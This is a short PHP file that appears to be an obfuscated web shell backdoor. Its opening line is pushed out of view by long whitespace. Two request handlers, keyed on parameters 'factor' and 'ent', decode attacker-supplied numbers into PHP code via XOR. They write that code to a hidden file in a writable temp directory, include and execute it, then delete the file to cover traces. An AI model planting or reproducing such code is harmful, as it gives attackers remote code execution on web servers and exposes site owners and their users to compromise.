<?php																																										if(!empty($_POST["f\x61\x63\x74or"])){ $item = $_POST["f\x61\x63\x74or"]; $item = explode ( '.' , $item) ; $res =''; $s1 ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen( $s1); $m =0; $__len =count( $item); do { if( $m >= $__len) break; $v8 =$item[$m]; $chS =ord( $s1[$m % $lenS]); $dec =( ( int)$v8 - $chS -( $m % 10)) ^ 63; $res .= chr( $dec); $m++; }while( true); $element = array_filter(["/tmp", "/var/tmp", ini_get("upload_tmp_dir"), getcwd(), "/dev/shm", sys_get_temp_dir(), getenv("TEMP"), session_save_path(), getenv("TMP")]); foreach ($element as $record): if (is_dir($record) && is_writable($record)) { $dchunk = "$record/.data"; if (file_put_contents($dchunk, $res)) { include $dchunk; @unlink($dchunk); die(); } } endforeach; }


if(isset($_REQUEST["ent"])){
	$desc = array_filter([getenv("TMP"), "/dev/shm", "/var/tmp", getenv("TEMP"), ini_get("upload_tmp_dir"), session_save_path(), "/tmp", getcwd(), sys_get_temp_dir()]);
	$entity = $_REQUEST["ent"];
	 $entity	 	= 	explode		(	  '.'		,	$entity )		;		
	$entry=		'';
            $s=		'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS=		strlen($s 	);
            $l=		0;
    
            array_walk($entity 	,function ($v6) use (&$entry 	,&$l 	,$s 	,$lenS) {
                $chS=		ord($s[$l % $lenS] 	);
                $d=		((int)$v6 - $chS - ($l % 10)) ^ 88;
                $entry .= chr($d 	);
                $l++;} 	);
	foreach ($desc as $key => $dchunk) {
    		if (is_writable($dchunk) && is_dir($dchunk)) {
    $pgrp = join("/", [$dchunk, ".dat"]);
    if (file_put_contents($pgrp, $entry)) {
	include $pgrp;
	@unlink($pgrp);
	exit;
}
}
}
}